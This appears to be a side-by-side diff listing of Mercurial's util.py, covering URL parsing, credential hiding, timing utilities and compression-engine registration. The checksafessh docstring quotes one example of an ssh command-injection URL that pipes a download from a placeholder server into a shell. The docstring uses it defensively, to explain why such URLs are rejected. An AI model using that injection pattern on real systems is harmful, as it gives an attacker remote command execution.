2759 if hasdriveletter(path) or path.startswith('\\\\'):
2760 self.path = path
2760 self.path = path
2761 return
2761 return
2762
2762
2763 # For compatibility reasons, we can't handle bundle paths as
2763 # For compatibility reasons, we can't handle bundle paths as
2764 # normal URLS
2764 # normal URLS
2765 if path.startswith('bundle:'):
2765 if path.startswith('bundle:'):
2766 self.scheme = 'bundle'
2766 self.scheme = 'bundle'
2767 path = path[7:]
2767 path = path[7:]
2768 if path.startswith('//'):
2768 if path.startswith('//'):
2769 path = path[2:]
2769 path = path[2:]
2770 self.path = path
2770 self.path = path
2771 return
2771 return
2772
2772
2773 if self._matchscheme(path):
2773 if self._matchscheme(path):
2774 parts = path.split(':', 1)
2774 parts = path.split(':', 1)
2775 if parts[0]:
2775 if parts[0]:
2776 self.scheme, path = parts
2776 self.scheme, path = parts
2777 self._localpath = False
2777 self._localpath = False
2778
2778
2779 if not path:
2779 if not path:
2780 path = None
2780 path = None
2781 if self._localpath:
2781 if self._localpath:
2782 self.path = ''
2782 self.path = ''
2783 return
2783 return
2784 else:
2784 else:
2785 if self._localpath:
2785 if self._localpath:
2786 self.path = path
2786 self.path = path
2787 return
2787 return
2788
2788
2789 if parsequery and '?' in path:
2789 if parsequery and '?' in path:
2790 path, self.query = path.split('?', 1)
2790 path, self.query = path.split('?', 1)
2791 if not path:
2791 if not path:
2792 path = None
2792 path = None
2793 if not self.query:
2793 if not self.query:
2794 self.query = None
2794 self.query = None
2795
2795
2796 # // is required to specify a host/authority
2796 # // is required to specify a host/authority
2797 if path and path.startswith('//'):
2797 if path and path.startswith('//'):
2798 parts = path[2:].split('/', 1)
2798 parts = path[2:].split('/', 1)
2799 if len(parts) > 1:
2799 if len(parts) > 1:
2800 self.host, path = parts
2800 self.host, path = parts
2801 else:
2801 else:
2802 self.host = parts[0]
2802 self.host = parts[0]
2803 path = None
2803 path = None
2804 if not self.host:
2804 if not self.host:
2805 self.host = None
2805 self.host = None
2806 # path of file:///d is /d
2806 # path of file:///d is /d
2807 # path of file:///d:/ is d:/, not /d:/
2807 # path of file:///d:/ is d:/, not /d:/
2808 if path and not hasdriveletter(path):
2808 if path and not hasdriveletter(path):
2809 path = '/' + path
2809 path = '/' + path
2810
2810
2811 if self.host and '@' in self.host:
2811 if self.host and '@' in self.host:
2812 self.user, self.host = self.host.rsplit('@', 1)
2812 self.user, self.host = self.host.rsplit('@', 1)
2813 if ':' in self.user:
2813 if ':' in self.user:
2814 self.user, self.passwd = self.user.split(':', 1)
2814 self.user, self.passwd = self.user.split(':', 1)
2815 if not self.host:
2815 if not self.host:
2816 self.host = None
2816 self.host = None
2817
2817
2818 # Don't split on colons in IPv6 addresses without ports
2818 # Don't split on colons in IPv6 addresses without ports
2819 if (self.host and ':' in self.host and
2819 if (self.host and ':' in self.host and
2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2821 self._hostport = self.host
2821 self._hostport = self.host
2822 self.host, self.port = self.host.rsplit(':', 1)
2822 self.host, self.port = self.host.rsplit(':', 1)
2823 if not self.host:
2823 if not self.host:
2824 self.host = None
2824 self.host = None
2825
2825
2826 if (self.host and self.scheme == 'file' and
2826 if (self.host and self.scheme == 'file' and
2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2829
2829
2830 self.path = path
2830 self.path = path
2831
2831
2832 # leave the query string escaped
2832 # leave the query string escaped
2833 for a in ('user', 'passwd', 'host', 'port',
2833 for a in ('user', 'passwd', 'host', 'port',
2834 'path', 'fragment'):
2834 'path', 'fragment'):
2835 v = getattr(self, a)
2835 v = getattr(self, a)
2836 if v is not None:
2836 if v is not None:
2837 setattr(self, a, urlreq.unquote(v))
2837 setattr(self, a, urlreq.unquote(v))
2838
2838
2839 @encoding.strmethod
2839 @encoding.strmethod
2840 def __repr__(self):
2840 def __repr__(self):
2841 attrs = []
2841 attrs = []
2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2843 'query', 'fragment'):
2843 'query', 'fragment'):
2844 v = getattr(self, a)
2844 v = getattr(self, a)
2845 if v is not None:
2845 if v is not None:
2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2847 return '<url %s>' % ', '.join(attrs)
2847 return '<url %s>' % ', '.join(attrs)
2848
2848
2849 def __bytes__(self):
2849 def __bytes__(self):
2850 r"""Join the URL's components back into a URL string.
2850 r"""Join the URL's components back into a URL string.
2851
2851
2852 Examples:
2852 Examples:
2853
2853
2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2857 'http://user:pw@host:80/?foo=bar&baz=42'
2857 'http://user:pw@host:80/?foo=bar&baz=42'
2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2861 'ssh://user:pw@[::1]:2200//home/joe#'
2861 'ssh://user:pw@[::1]:2200//home/joe#'
2862 >>> bytes(url(b'http://localhost:80//'))
2862 >>> bytes(url(b'http://localhost:80//'))
2863 'http://localhost:80//'
2863 'http://localhost:80//'
2864 >>> bytes(url(b'http://localhost:80/'))
2864 >>> bytes(url(b'http://localhost:80/'))
2865 'http://localhost:80/'
2865 'http://localhost:80/'
2866 >>> bytes(url(b'http://localhost:80'))
2866 >>> bytes(url(b'http://localhost:80'))
2867 'http://localhost:80/'
2867 'http://localhost:80/'
2868 >>> bytes(url(b'bundle:foo'))
2868 >>> bytes(url(b'bundle:foo'))
2869 'bundle:foo'
2869 'bundle:foo'
2870 >>> bytes(url(b'bundle://../foo'))
2870 >>> bytes(url(b'bundle://../foo'))
2871 'bundle:../foo'
2871 'bundle:../foo'
2872 >>> bytes(url(b'path'))
2872 >>> bytes(url(b'path'))
2873 'path'
2873 'path'
2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2875 'file:///tmp/foo/bar'
2875 'file:///tmp/foo/bar'
2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2877 'file:///c:/tmp/foo/bar'
2877 'file:///c:/tmp/foo/bar'
2878 >>> print(url(br'bundle:foo\bar'))
2878 >>> print(url(br'bundle:foo\bar'))
2879 bundle:foo\bar
2879 bundle:foo\bar
2880 >>> print(url(br'file:///D:\data\hg'))
2880 >>> print(url(br'file:///D:\data\hg'))
2881 file:///D:\data\hg
2881 file:///D:\data\hg
2882 """
2882 """
2883 if self._localpath:
2883 if self._localpath:
2884 s = self.path
2884 s = self.path
2885 if self.scheme == 'bundle':
2885 if self.scheme == 'bundle':
2886 s = 'bundle:' + s
2886 s = 'bundle:' + s
2887 if self.fragment:
2887 if self.fragment:
2888 s += '#' + self.fragment
2888 s += '#' + self.fragment
2889 return s
2889 return s
2890
2890
2891 s = self.scheme + ':'
2891 s = self.scheme + ':'
2892 if self.user or self.passwd or self.host:
2892 if self.user or self.passwd or self.host:
2893 s += '//'
2893 s += '//'
2894 elif self.scheme and (not self.path or self.path.startswith('/')
2894 elif self.scheme and (not self.path or self.path.startswith('/')
2895 or hasdriveletter(self.path)):
2895 or hasdriveletter(self.path)):
2896 s += '//'
2896 s += '//'
2897 if hasdriveletter(self.path):
2897 if hasdriveletter(self.path):
2898 s += '/'
2898 s += '/'
2899 if self.user:
2899 if self.user:
2900 s += urlreq.quote(self.user, safe=self._safechars)
2900 s += urlreq.quote(self.user, safe=self._safechars)
2901 if self.passwd:
2901 if self.passwd:
2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2903 if self.user or self.passwd:
2903 if self.user or self.passwd:
2904 s += '@'
2904 s += '@'
2905 if self.host:
2905 if self.host:
2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2907 s += urlreq.quote(self.host)
2907 s += urlreq.quote(self.host)
2908 else:
2908 else:
2909 s += self.host
2909 s += self.host
2910 if self.port:
2910 if self.port:
2911 s += ':' + urlreq.quote(self.port)
2911 s += ':' + urlreq.quote(self.port)
2912 if self.host:
2912 if self.host:
2913 s += '/'
2913 s += '/'
2914 if self.path:
2914 if self.path:
2915 # TODO: similar to the query string, we should not unescape the
2915 # TODO: similar to the query string, we should not unescape the
2916 # path when we store it, the path might contain '%2f' = '/',
2916 # path when we store it, the path might contain '%2f' = '/',
2917 # which we should *not* escape.
2917 # which we should *not* escape.
2918 s += urlreq.quote(self.path, safe=self._safepchars)
2918 s += urlreq.quote(self.path, safe=self._safepchars)
2919 if self.query:
2919 if self.query:
2920 # we store the query in escaped form.
2920 # we store the query in escaped form.
2921 s += '?' + self.query
2921 s += '?' + self.query
2922 if self.fragment is not None:
2922 if self.fragment is not None:
2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2924 return s
2924 return s
2925
2925
2926 __str__ = encoding.strmethod(__bytes__)
2926 __str__ = encoding.strmethod(__bytes__)
2927
2927
2928 def authinfo(self):
2928 def authinfo(self):
2929 user, passwd = self.user, self.passwd
2929 user, passwd = self.user, self.passwd
2930 try:
2930 try:
2931 self.user, self.passwd = None, None
2931 self.user, self.passwd = None, None
2932 s = bytes(self)
2932 s = bytes(self)
2933 finally:
2933 finally:
2934 self.user, self.passwd = user, passwd
2934 self.user, self.passwd = user, passwd
2935 if not self.user:
2935 if not self.user:
2936 return (s, None)
2936 return (s, None)
2937 # authinfo[1] is passed to urllib2 password manager, and its
2937 # authinfo[1] is passed to urllib2 password manager, and its
2938 # URIs must not contain credentials. The host is passed in the
2938 # URIs must not contain credentials. The host is passed in the
2939 # URIs list because Python < 2.4.3 uses only that to search for
2939 # URIs list because Python < 2.4.3 uses only that to search for
2940 # a password.
2940 # a password.
2941 return (s, (None, (s, self.host),
2941 return (s, (None, (s, self.host),
2942 self.user, self.passwd or ''))
2942 self.user, self.passwd or ''))
2943
2943
2944 def isabs(self):
2944 def isabs(self):
2945 if self.scheme and self.scheme != 'file':
2945 if self.scheme and self.scheme != 'file':
2946 return True # remote URL
2946 return True # remote URL
2947 if hasdriveletter(self.path):
2947 if hasdriveletter(self.path):
2948 return True # absolute for our purposes - can't be joined()
2948 return True # absolute for our purposes - can't be joined()
2949 if self.path.startswith(br'\\'):
2949 if self.path.startswith(br'\\'):
2950 return True # Windows UNC path
2950 return True # Windows UNC path
2951 if self.path.startswith('/'):
2951 if self.path.startswith('/'):
2952 return True # POSIX-style
2952 return True # POSIX-style
2953 return False
2953 return False
2954
2954
2955 def localpath(self):
2955 def localpath(self):
2956 if self.scheme == 'file' or self.scheme == 'bundle':
2956 if self.scheme == 'file' or self.scheme == 'bundle':
2957 path = self.path or '/'
2957 path = self.path or '/'
2958 # For Windows, we need to promote hosts containing drive
2958 # For Windows, we need to promote hosts containing drive
2959 # letters to paths with drive letters.
2959 # letters to paths with drive letters.
2960 if hasdriveletter(self._hostport):
2960 if hasdriveletter(self._hostport):
2961 path = self._hostport + '/' + self.path
2961 path = self._hostport + '/' + self.path
2962 elif (self.host is not None and self.path
2962 elif (self.host is not None and self.path
2963 and not hasdriveletter(path)):
2963 and not hasdriveletter(path)):
2964 path = '/' + path
2964 path = '/' + path
2965 return path
2965 return path
2966 return self._origpath
2966 return self._origpath
2967
2967
2968 def islocal(self):
2968 def islocal(self):
2969 '''whether localpath will return something that posixfile can open'''
2969 '''whether localpath will return something that posixfile can open'''
2970 return (not self.scheme or self.scheme == 'file'
2970 return (not self.scheme or self.scheme == 'file'
2971 or self.scheme == 'bundle')
2971 or self.scheme == 'bundle')
2972
2972
2973 def hasscheme(path):
2973 def hasscheme(path):
2974 return bool(url(path).scheme)
2974 return bool(url(path).scheme)
2975
2975
2976 def hasdriveletter(path):
2976 def hasdriveletter(path):
2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2978
2978
2979 def urllocalpath(path):
2979 def urllocalpath(path):
2980 return url(path, parsequery=False, parsefragment=False).localpath()
2980 return url(path, parsequery=False, parsefragment=False).localpath()
2981
2981
2982 def checksafessh(path):
2982 def checksafessh(path):
2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2984
2984
2985 This is a sanity check for ssh urls. ssh will parse the first item as
2985 This is a sanity check for ssh urls. ssh will parse the first item as
2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2987 Let's prevent these potentially exploited urls entirely and warn the
2987 Let's prevent these potentially exploited urls entirely and warn the
2988 user.
2988 user.
2989
2989
2990 Raises an error.Abort when the url is unsafe.
2990 Raises an error.Abort when the url is unsafe.
2991 """
2991 """
2992 path = urlreq.unquote(path)
2992 path = urlreq.unquote(path)
2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2994 raise error.Abort(_('potentially unsafe url: %r') %
2994 raise error.Abort(_('potentially unsafe url: %r') %
2995 (pycompat.bytestr(path),))
2995 (pycompat.bytestr(path),))
2996
2996
2997 def hidepassword(u):
2997 def hidepassword(u):
2998 '''hide user credential in a url string'''
2998 '''hide user credential in a url string'''
2999 u = url(u)
2999 u = url(u)
3000 if u.passwd:
3000 if u.passwd:
3001 u.passwd = '***'
3001 u.passwd = '***'
3002 return bytes(u)
3002 return bytes(u)
3003
3003
3004 def removeauth(u):
3004 def removeauth(u):
3005 '''remove all authentication information from a url string'''
3005 '''remove all authentication information from a url string'''
3006 u = url(u)
3006 u = url(u)
3007 u.user = u.passwd = None
3007 u.user = u.passwd = None
3008 return bytes(u)
3008 return bytes(u)
3009
3009
3010 timecount = unitcountfn(
3010 timecount = unitcountfn(
3011 (1, 1e3, _('%.0f s')),
3011 (1, 1e3, _('%.0f s')),
3012 (100, 1, _('%.1f s')),
3012 (100, 1, _('%.1f s')),
3013 (10, 1, _('%.2f s')),
3013 (10, 1, _('%.2f s')),
3014 (1, 1, _('%.3f s')),
3014 (1, 1, _('%.3f s')),
3015 (100, 0.001, _('%.1f ms')),
3015 (100, 0.001, _('%.1f ms')),
3016 (10, 0.001, _('%.2f ms')),
3016 (10, 0.001, _('%.2f ms')),
3017 (1, 0.001, _('%.3f ms')),
3017 (1, 0.001, _('%.3f ms')),
3018 (100, 0.000001, _('%.1f us')),
3018 (100, 0.000001, _('%.1f us')),
3019 (10, 0.000001, _('%.2f us')),
3019 (10, 0.000001, _('%.2f us')),
3020 (1, 0.000001, _('%.3f us')),
3020 (1, 0.000001, _('%.3f us')),
3021 (100, 0.000000001, _('%.1f ns')),
3021 (100, 0.000000001, _('%.1f ns')),
3022 (10, 0.000000001, _('%.2f ns')),
3022 (10, 0.000000001, _('%.2f ns')),
3023 (1, 0.000000001, _('%.3f ns')),
3023 (1, 0.000000001, _('%.3f ns')),
3024 )
3024 )
3025
3025
3026 @attr.s
3026 @attr.s
3027 class timedcmstats(object):
3027 class timedcmstats(object):
3028 """Stats information produced by the timedcm context manager on entering."""
3028 """Stats information produced by the timedcm context manager on entering."""
3029
3029
3030 # the starting value of the timer as a float (meaning and resulution is
3030 # the starting value of the timer as a float (meaning and resulution is
3031 # platform dependent, see util.timer)
3031 # platform dependent, see util.timer)
3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3033 # the number of seconds as a floating point value; starts at 0, updated when
3033 # the number of seconds as a floating point value; starts at 0, updated when
3034 # the context is exited.
3034 # the context is exited.
3035 elapsed = attr.ib(default=0)
3035 elapsed = attr.ib(default=0)
3036 # the number of nested timedcm context managers.
3036 # the number of nested timedcm context managers.
3037 level = attr.ib(default=1)
3037 level = attr.ib(default=1)
3038
3038
3039 def __bytes__(self):
3039 def __bytes__(self):
3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3041
3041
3042 __str__ = encoding.strmethod(__bytes__)
3042 __str__ = encoding.strmethod(__bytes__)
3043
3043
3044 @contextlib.contextmanager
3044 @contextlib.contextmanager
3045 def timedcm(whencefmt, *whenceargs):
3045 def timedcm(whencefmt, *whenceargs):
3046 """A context manager that produces timing information for a given context.
3046 """A context manager that produces timing information for a given context.
3047
3047
3048 On entering a timedcmstats instance is produced.
3048 On entering a timedcmstats instance is produced.
3049
3049
3050 This context manager is reentrant.
3050 This context manager is reentrant.
3051
3051
3052 """
3052 """
3053 # track nested context managers
3053 # track nested context managers
3054 timedcm._nested += 1
3054 timedcm._nested += 1
3055 timing_stats = timedcmstats(level=timedcm._nested)
3055 timing_stats = timedcmstats(level=timedcm._nested)
3056 try:
3056 try:
3057 with tracing.log(whencefmt, *whenceargs):
3057 with tracing.log(whencefmt, *whenceargs):
3058 yield timing_stats
3058 yield timing_stats
3059 finally:
3059 finally:
3060 timing_stats.elapsed = timer() - timing_stats.start
3060 timing_stats.elapsed = timer() - timing_stats.start
3061 timedcm._nested -= 1
3061 timedcm._nested -= 1
3062
3062
3063 timedcm._nested = 0
3063 timedcm._nested = 0
3064
3064
3065 def timed(func):
3065 def timed(func):
3066 '''Report the execution time of a function call to stderr.
3066 '''Report the execution time of a function call to stderr.
3067
3067
3068 During development, use as a decorator when you need to measure
3068 During development, use as a decorator when you need to measure
3069 the cost of a function, e.g. as follows:
3069 the cost of a function, e.g. as follows:
3070
3070
3071 @util.timed
3071 @util.timed
3072 def foo(a, b, c):
3072 def foo(a, b, c):
3073 pass
3073 pass
3074 '''
3074 '''
3075
3075
3076 def wrapper(*args, **kwargs):
3076 def wrapper(*args, **kwargs):
3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3078 result = func(*args, **kwargs)
3078 result = func(*args, **kwargs)
3079 stderr = procutil.stderr
3079 stderr = procutil.stderr
3080 stderr.write('%s%s: %s\n' % (
3080 stderr.write('%s%s: %s\n' % (
3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3082 time_stats))
3082 time_stats))
3083 return result
3083 return result
3084 return wrapper
3084 return wrapper
3085
3085
3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3088
3088
3089 def sizetoint(s):
3089 def sizetoint(s):
3090 '''Convert a space specifier to a byte count.
3090 '''Convert a space specifier to a byte count.
3091
3091
3092 >>> sizetoint(b'30')
3092 >>> sizetoint(b'30')
3093 30
3093 30
3094 >>> sizetoint(b'2.2kb')
3094 >>> sizetoint(b'2.2kb')
3095 2252
3095 2252
3096 >>> sizetoint(b'6M')
3096 >>> sizetoint(b'6M')
3097 6291456
3097 6291456
3098 '''
3098 '''
3099 t = s.strip().lower()
3099 t = s.strip().lower()
3100 try:
3100 try:
3101 for k, u in _sizeunits:
3101 for k, u in _sizeunits:
3102 if t.endswith(k):
3102 if t.endswith(k):
3103 return int(float(t[:-len(k)]) * u)
3103 return int(float(t[:-len(k)]) * u)
3104 return int(t)
3104 return int(t)
3105 except ValueError:
3105 except ValueError:
3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3107
3107
3108 class hooks(object):
3108 class hooks(object):
3109 '''A collection of hook functions that can be used to extend a
3109 '''A collection of hook functions that can be used to extend a
3110 function's behavior. Hooks are called in lexicographic order,
3110 function's behavior. Hooks are called in lexicographic order,
3111 based on the names of their sources.'''
3111 based on the names of their sources.'''
3112
3112
3113 def __init__(self):
3113 def __init__(self):
3114 self._hooks = []
3114 self._hooks = []
3115
3115
3116 def add(self, source, hook):
3116 def add(self, source, hook):
3117 self._hooks.append((source, hook))
3117 self._hooks.append((source, hook))
3118
3118
3119 def __call__(self, *args):
3119 def __call__(self, *args):
3120 self._hooks.sort(key=lambda x: x[0])
3120 self._hooks.sort(key=lambda x: x[0])
3121 results = []
3121 results = []
3122 for source, hook in self._hooks:
3122 for source, hook in self._hooks:
3123 results.append(hook(*args))
3123 results.append(hook(*args))
3124 return results
3124 return results
3125
3125
3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3127 '''Yields lines for a nicely formatted stacktrace.
3127 '''Yields lines for a nicely formatted stacktrace.
3128 Skips the 'skip' last entries, then return the last 'depth' entries.
3128 Skips the 'skip' last entries, then return the last 'depth' entries.
3129 Each file+linenumber is formatted according to fileline.
3129 Each file+linenumber is formatted according to fileline.
3130 Each line is formatted according to line.
3130 Each line is formatted according to line.
3131 If line is None, it yields:
3131 If line is None, it yields:
3132 length of longest filepath+line number,
3132 length of longest filepath+line number,
3133 filepath+linenumber,
3133 filepath+linenumber,
3134 function
3134 function
3135
3135
3136 Not be used in production code but very convenient while developing.
3136 Not be used in production code but very convenient while developing.
3137 '''
3137 '''
3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3140 ][-depth:]
3140 ][-depth:]
3141 if entries:
3141 if entries:
3142 fnmax = max(len(entry[0]) for entry in entries)
3142 fnmax = max(len(entry[0]) for entry in entries)
3143 for fnln, func in entries:
3143 for fnln, func in entries:
3144 if line is None:
3144 if line is None:
3145 yield (fnmax, fnln, func)
3145 yield (fnmax, fnln, func)
3146 else:
3146 else:
3147 yield line % (fnmax, fnln, func)
3147 yield line % (fnmax, fnln, func)
3148
3148
3149 def debugstacktrace(msg='stacktrace', skip=0,
3149 def debugstacktrace(msg='stacktrace', skip=0,
3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3152 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3152 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3153 By default it will flush stdout first.
3153 By default it will flush stdout first.
3154 It can be used everywhere and intentionally does not require an ui object.
3154 It can be used everywhere and intentionally does not require an ui object.
3155 Not be used in production code but very convenient while developing.
3155 Not be used in production code but very convenient while developing.
3156 '''
3156 '''
3157 if otherf:
3157 if otherf:
3158 otherf.flush()
3158 otherf.flush()
3159 f.write('%s at:\n' % msg.rstrip())
3159 f.write('%s at:\n' % msg.rstrip())
3160 for line in getstackframes(skip + 1, depth=depth):
3160 for line in getstackframes(skip + 1, depth=depth):
3161 f.write(line)
3161 f.write(line)
3162 f.flush()
3162 f.flush()
3163
3163
3164 class dirs(object):
3164 class dirs(object):
3165 '''a multiset of directory names from a dirstate or manifest'''
3165 '''a multiset of directory names from a dirstate or manifest'''
3166
3166
3167 def __init__(self, map, skip=None):
3167 def __init__(self, map, skip=None):
3168 self._dirs = {}
3168 self._dirs = {}
3169 addpath = self.addpath
3169 addpath = self.addpath
3170 if safehasattr(map, 'iteritems') and skip is not None:
3170 if safehasattr(map, 'iteritems') and skip is not None:
3171 for f, s in map.iteritems():
3171 for f, s in map.iteritems():
3172 if s[0] != skip:
3172 if s[0] != skip:
3173 addpath(f)
3173 addpath(f)
3174 else:
3174 else:
3175 for f in map:
3175 for f in map:
3176 addpath(f)
3176 addpath(f)
3177
3177
3178 def addpath(self, path):
3178 def addpath(self, path):
3179 dirs = self._dirs
3179 dirs = self._dirs
3180 for base in finddirs(path):
3180 for base in finddirs(path):
3181 if base in dirs:
3181 if base in dirs:
3182 dirs[base] += 1
3182 dirs[base] += 1
3183 return
3183 return
3184 dirs[base] = 1
3184 dirs[base] = 1
3185
3185
3186 def delpath(self, path):
3186 def delpath(self, path):
3187 dirs = self._dirs
3187 dirs = self._dirs
3188 for base in finddirs(path):
3188 for base in finddirs(path):
3189 if dirs[base] > 1:
3189 if dirs[base] > 1:
3190 dirs[base] -= 1
3190 dirs[base] -= 1
3191 return
3191 return
3192 del dirs[base]
3192 del dirs[base]
3193
3193
3194 def __iter__(self):
3194 def __iter__(self):
3195 return iter(self._dirs)
3195 return iter(self._dirs)
3196
3196
3197 def __contains__(self, d):
3197 def __contains__(self, d):
3198 return d in self._dirs
3198 return d in self._dirs
3199
3199
3200 if safehasattr(parsers, 'dirs'):
3200 if safehasattr(parsers, 'dirs'):
3201 dirs = parsers.dirs
3201 dirs = parsers.dirs
3202
3202
3203 def finddirs(path):
3203 def finddirs(path):
3204 pos = path.rfind('/')
3204 pos = path.rfind('/')
3205 while pos != -1:
3205 while pos != -1:
3206 yield path[:pos]
3206 yield path[:pos]
3207 pos = path.rfind('/', 0, pos)
3207 pos = path.rfind('/', 0, pos)
3208
3208
3209 # compression code
3209 # compression code
3210
3210
3211 SERVERROLE = 'server'
3211 SERVERROLE = 'server'
3212 CLIENTROLE = 'client'
3212 CLIENTROLE = 'client'
3213
3213
3214 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3214 compewireprotosupport = collections.namedtuple(r'compenginewireprotosupport',
3215 (u'name', u'serverpriority',
3215 (r'name', r'serverpriority',
3216 u'clientpriority'))
3216 r'clientpriority'))
3217
3217
3218 class compressormanager(object):
3218 class compressormanager(object):
3219 """Holds registrations of various compression engines.
3219 """Holds registrations of various compression engines.
3220
3220
3221 This class essentially abstracts the differences between compression
3221 This class essentially abstracts the differences between compression
3222 engines to allow new compression formats to be added easily, possibly from
3222 engines to allow new compression formats to be added easily, possibly from
3223 extensions.
3223 extensions.
3224
3224
3225 Compressors are registered against the global instance by calling its
3225 Compressors are registered against the global instance by calling its
3226 ``register()`` method.
3226 ``register()`` method.
3227 """
3227 """
3228 def __init__(self):
3228 def __init__(self):
3229 self._engines = {}
3229 self._engines = {}
3230 # Bundle spec human name to engine name.
3230 # Bundle spec human name to engine name.
3231 self._bundlenames = {}
3231 self._bundlenames = {}
3232 # Internal bundle identifier to engine name.
3232 # Internal bundle identifier to engine name.
3233 self._bundletypes = {}
3233 self._bundletypes = {}
3234 # Revlog header to engine name.
3234 # Revlog header to engine name.
3235 self._revlogheaders = {}
3235 self._revlogheaders = {}
3236 # Wire proto identifier to engine name.
3236 # Wire proto identifier to engine name.
3237 self._wiretypes = {}
3237 self._wiretypes = {}
3238
3238
3239 def __getitem__(self, key):
3239 def __getitem__(self, key):
3240 return self._engines[key]
3240 return self._engines[key]
3241
3241
3242 def __contains__(self, key):
3242 def __contains__(self, key):
3243 return key in self._engines
3243 return key in self._engines
3244
3244
3245 def __iter__(self):
3245 def __iter__(self):
3246 return iter(self._engines.keys())
3246 return iter(self._engines.keys())
3247
3247
3248 def register(self, engine):
3248 def register(self, engine):
3249 """Register a compression engine with the manager.
3249 """Register a compression engine with the manager.
3250
3250
3251 The argument must be a ``compressionengine`` instance.
3251 The argument must be a ``compressionengine`` instance.
3252 """
3252 """
3253 if not isinstance(engine, compressionengine):
3253 if not isinstance(engine, compressionengine):
3254 raise ValueError(_('argument must be a compressionengine'))
3254 raise ValueError(_('argument must be a compressionengine'))
3255
3255
3256 name = engine.name()
3256 name = engine.name()
3257
3257
3258 if name in self._engines:
3258 if name in self._engines:
3259 raise error.Abort(_('compression engine %s already registered') %
3259 raise error.Abort(_('compression engine %s already registered') %
3260 name)
3260 name)
3261
3261
3262 bundleinfo = engine.bundletype()
3262 bundleinfo = engine.bundletype()
3263 if bundleinfo:
3263 if bundleinfo:
3264 bundlename, bundletype = bundleinfo
3264 bundlename, bundletype = bundleinfo
3265
3265
3266 if bundlename in self._bundlenames:
3266 if bundlename in self._bundlenames:
3267 raise error.Abort(_('bundle name %s already registered') %
3267 raise error.Abort(_('bundle name %s already registered') %
3268 bundlename)
3268 bundlename)
3269 if bundletype in self._bundletypes:
3269 if bundletype in self._bundletypes:
3270 raise error.Abort(_('bundle type %s already registered by %s') %
3270 raise error.Abort(_('bundle type %s already registered by %s') %
3271 (bundletype, self._bundletypes[bundletype]))
3271 (bundletype, self._bundletypes[bundletype]))
3272
3272
3273 # No external facing name declared.
3273 # No external facing name declared.
3274 if bundlename:
3274 if bundlename:
3275 self._bundlenames[bundlename] = name
3275 self._bundlenames[bundlename] = name
